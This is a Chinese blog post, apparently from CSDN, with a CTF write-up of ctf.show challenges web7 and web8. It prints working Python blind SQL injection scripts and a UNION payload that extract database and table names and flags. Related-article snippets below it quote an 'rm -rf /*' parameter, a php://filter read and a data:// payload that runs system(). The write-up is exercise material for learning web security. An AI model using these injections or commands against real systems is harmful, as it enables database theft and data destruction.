CTF.show:web7-web8

最新推荐文章于 2024-05-11 09:59:45 发布
最新推荐文章于 2024-05-11 09:59:45 发布
阅读量916 收藏 1
点赞数
分类专栏: CTF.show CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/112671318
版权

web7

这题是一题盲注题,对url进行盲注测试
从网上找到的师傅的爆表名脚本

import  requests
url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/"


def db(url):  # 爆库名
    for i in range(1, 5):
        for j in range(32, 128):
            u = "or/**/ascii(substr(database()/**/from/**/" + str(i) + "/**/for/**/1))=" + str(j) + "#"
            s = url + u
            print(s)
            r = requests.get(s)
            if 'By Rudyard Kipling' in r.text:
                print(chr(j))


def table(url):  # 爆表名
    for i in range(4):
        table_name = ''
        for j in range(1, 6):
            for k in range(48, 128):
                u = id = "||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/" + str(
                    i) + ")/**/from/**/" + str(j) + "/**/for/**/1))=" + str(k) + "#"
                s = url + u
                print(s)
                r = requests.get(s)
                if 'By Rudyard Kipling' in r.text:
                    table_name += chr(k)
            print(table_name)


db(url);
table(url);

在这里插入图片描述在这里插入图片描述在这里插入图片描述
一共有三个表,尝试猜测为flag下的flag字段

/index.php?id=-1/**/union/**/select/**/1,flag,3/**/from/**/flag#

得到flag
在这里插入图片描述

web8

这个看起来和web7很像,但是经过测试,对union进行过滤
找了别的师傅的payload
通过布尔盲注,测试存在的表名和字段名,读取flag

import requests
s=requests.session()
url='http://ab7573d3-1de2-42bd-bc68-26aaca8af4dc.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break
FW_ENJOEY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ist的matlab代码-darkarmy-ctf.github.io:darkarmy-ctf.github.io
05-26
ist的matlab代码黑暗军团 描述: Dark Army是一支由CTF组成的国际团队,...活动:9月25日,上午8:30(IST)-9月27日,上午8:30(IST) 分类: 网页 各种各样的 法证 倒车 Pwn 加密货币 OSINT 旗帜! 捕捉全部! 链接:
teamrocketist.github.io:CTF Team -TeamRocketIST的网站源代码-git source code
03-25
teamrocketist.github.io:CTF Team -TeamRocketIST的网站源代码
CTFshow_萌新(web
果粒程
01-09 496
CTFshow_萌新(web
ctfshow web8--sql注入
Dream'
10-19 2114
问题描述 题目提示是一道sql注入题 打开题目,猜测注入点应该在id那里 经过测试,发现该题过滤了union关键字、单引号、逗号、空格 问题解决 1.过滤了union关键字就不可以用联合注入了,尝试布尔盲注。 2.过滤了逗号,使用mid(username from 1 for 1)代替mid(username,1,1); 使用limit 1 offset 1代替limit 1,1 3.过滤了空格就是用/**/注释来绕过。 4.过滤了...
2024年最新ctfshow-WEB-web8_ctfshow web8,想搞定大厂面试官
2401_84301227的博客
05-06 635
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。由于SQL恒成立, 数据库将查询出表中的所有内容, 并返回到前端展示。
ctfshow-web80
m0_73303597的博客
01-04 618
自用
ctfshow web系列
RealIiikun的博客
04-07 957
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
2024年最新ctfshow-WEB-web8_ctfshow web8,2024年最新全网首发
最新发布
m0_54903333的博客
05-11 258
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。接下来进行脱库, 由于盲注脱库比较复杂, 此处我们构造Python脚本进行自动化脱库, 注意payload中的字符串不要换行, 否则可能会出问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。由以上返回结果可知, 该页面存在SQL注入, 注入点为。成功获取当前数据库名: web8。接下来获取获取数据库中所有表。因篇幅有限,仅展示部分资料。
ctf-br.github.io:CTF-BR
07-06
1. **博客文章**:CTF-BR博客中包含了一系列关于网络安全、漏洞挖掘、逆向工程、密码学和Web安全等方面的文章。这些文章通常由社区成员贡献,旨在分享他们在解决CTF挑战过程中的经验和技巧。 2. **教程与指南**:...
CTF资料.rar-------
02-16
ctf入门
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
ctfshow-萌新-web8( 从删库到跑路)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web8关,这一关考察的是一个梗??? 进去页面以后展示了部分源码,提交一个参数flag,与文件中的key相同即可夺旗 这一关的线索就在进入关卡的弹窗中,阿呆熟悉的一顿操作,去了埃塞尔比亚 是非洲的一个国家,这是删库跑路的节奏啊,payload如下 ?flag=rm -rf /* rm指令 rm -rf /* 是Linux的一条指令,/*代表根目录下所有路径,作用是删除根目录下所有文件,也就是删除系统中的所有文件 格式:rm ...
CTF_webshow_web8盲注脚本
weixin_54227009的博客
05-14 328
直接大佬脚本开始嗦: import requests url = 'http://438302a7-56ba-4098-ad0a-0f245da447b0.challenge.ctf.show/index.php?id=-1/**/or/**/' name = '' # 循环45次( 循环次数按照返回的字符串长度自定义) for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 603
ctfshow web7-web10
CTF-web 第十二部分 sqlmap专题
iamsongyu的博客
11-25 2364
  sqlmap开源又功能强大的工具,支持现在几乎所有的数据库,比国内的任何工具都强。支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效, 指纹识别技术判断数据库。   当给sqlmap这么一个url (http://192.168.136.131/sqlmap/mysql/get_...
ctfshow web7
博客地址 www.sec0nd.top
02-25 981
文章目录题目分析解题过程 题目分析 打开题目后,有三个文章 随便点一个之后发现网址上有个后缀 ?id=2 应该是get传参的注入了 在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注 他这个过滤了空格,用/**/代替(详见web6 wp) 解题过程 盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题 import requests s=requests.session() url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.ch
ctfshow 萌新计划web 1-7
m0_46412682的博客
07-14 819
ctfshow 萌新计划 1-7 1-4 /?id=‘1000’ 5 /?id=144^888 其实就是144异或888 6 /?id=~1000 ~表示取反 7 /?id=0b1111101000 0b表示二进制,0b1111101000=1000 参考: https://blog.csdn.net/qq_41617034/article/details/105249339?depth_1-utm_source=distribute.pc_relevant.none-task
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4171
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值